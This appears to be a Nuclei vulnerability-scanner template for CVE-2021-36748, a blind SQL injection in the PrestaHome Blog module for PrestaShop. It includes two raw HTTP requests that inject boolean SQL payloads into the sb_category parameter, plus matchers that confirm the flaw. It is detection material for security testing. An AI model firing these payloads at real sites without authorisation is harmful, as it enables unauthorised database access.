id: CVE-2021-36748 info: name: PrestaHome Blog for PrestaShop <1.7.8 - SQL Injection author: whoever severity: high description: PrestaHome Blog for PrestaShop prior to version 1.7.8 is vulnerable to a SQL injection (blind) via the sb_category parameter. reference: - https://blog.sorcery.ie/posts/ph_simpleblog_sqli/ - https://alysum5.promokit.eu/promokit/documentation/blog/ - https://blog.sorcery.ie - https://nvd.nist.gov/vuln/detail/CVE-2021-36748 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-36748 cwe-id: CWE-89 cpe: cpe:2.3:a:prestahome:blog:*:*:*:*:*:*:*:* epss-score: 0.00764 tags: cve,cve2021,prestashop,prestahome,sqli,cms metadata: max-request: 2 http: - raw: - | GET /module/ph_simpleblog/list?sb_category=')%20OR%20true--%20- HTTP/1.1 Host: {{Hostname}} - | GET /module/ph_simpleblog/list?sb_category=')%20AND%20false--%20- HTTP/1.1 Host: {{Hostname}} req-condition: true matchers: - type: dsl dsl: - "status_code_1 == 200" - "status_code_2 == 404" - 'contains(body_1, "prestashop")' - "contains(tolower(header_2), 'index.php?controller=404')" - "len(body_2) == 0" condition: and # Enhanced by mp on 2022/06/30